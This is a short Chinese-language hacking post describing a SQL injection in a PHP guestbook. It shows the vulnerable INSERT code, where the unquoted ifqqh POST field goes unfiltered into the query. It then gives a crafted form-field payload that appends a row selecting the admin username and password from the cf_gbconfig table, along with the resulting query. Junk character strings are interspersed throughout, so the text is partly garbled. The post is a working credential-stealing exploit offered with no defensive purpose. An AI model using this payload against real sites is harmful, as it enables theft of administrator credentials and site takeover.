留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。# G& Z' o9 Y) C% [# A8 V
7 ]3 T7 K, C, ? F9 ^& i$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
( w: n: G% T; H' E% [$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
/ H% h% [ F$ b: [' K% f/ j5 @0 p6 W; |0 b& d
提交的时候把ifqqh的值改一下。变成
" W+ s1 d6 C/ r5 N: ^% S+ D% J& p1 J [3 q) b: y& q( z' a3 l# l
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
- n: R2 o+ K, M0 E v- h( y6 ]" [# B1 O! n1 Q. E& G+ b
这样SQL插入语句就变了.( t2 B0 p$ @$ o/ W9 e
; l @2 i4 R' n- \3 H% B5 @0 yinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
% S$ _7 o% T( `3 i1 |2 S0 \% j$ e$ p6 H3 r! U+ W
构造了另外一句SQL。并且把帐号密码读出来。! C3 V$ t- n6 b1 D4 ^: t" T9 P
7 N( M2 R6 F) Y' j |